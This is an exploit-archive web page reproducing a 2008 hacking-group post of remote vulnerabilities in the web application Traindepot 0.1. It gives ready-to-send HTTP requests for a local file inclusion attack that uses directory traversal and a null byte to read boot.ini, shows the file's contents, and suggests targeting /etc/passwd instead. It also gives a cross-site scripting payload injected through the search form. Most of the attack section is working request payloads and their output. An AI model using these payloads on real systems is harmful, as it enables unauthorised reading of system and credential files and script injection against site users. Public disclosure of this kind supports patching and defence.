|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 4129 Milw0rm ID : 5848 Credit : CWH Underground Date : 19.6.2008 Exploit Code : ============================================================ Traindepot 0.1 (LFI/XSS) Multiple Remote Vulnerabilities ============================================================ ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 18 June 2008 SITE : www.citec.us ##################################################### APPLICATION : Traindepot VERSION : 0.1 VENDOR : N/A DOWNLOAD : http://downloads.sourceforge.net/traindepot ##################################################### --- Local File Inclusion --- ------------- Exploit ------------- [+] http://[Target]/[Traindepot_path]/index.php?module=[LFI] ------------- POC Exploit ------------- [+] GET http://192.168.24.25/traindepot/index.php?module=../../../../../../../../bo ot.ini%00 HTTP/1.1 [+] Accept: */* [+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) [+] Host: 192.168.24.25 [+] Cookie: PHPSESSID=3954bc593bfbf164295dfabbe2459187 This exploit will open boot.ini in system file: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) \WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) \WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect You can change boot.ini to /etc/passwd%00 in linux OS. --- Remote XSS (query) --- [+] http://[Target]/[Traindepot_path]/index.php?module=search --------------------------- POC Exploit [POST Method] --------------------------- [+] POST http://192.168.24.25/traindepot/index.php?module=search HTTP/1.1 [+] Accept: */* [+] Content-Type: application/x-www-form-urlencoded [+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) [+] Host: 192.168.24.25 [+] Content-Length: 70 [+] Cookie: PHPSESSID=3954bc593bfbf164295dfabbe2459187 [+] query=<script>alert(123);</script>&search=%3F ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## |
||
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |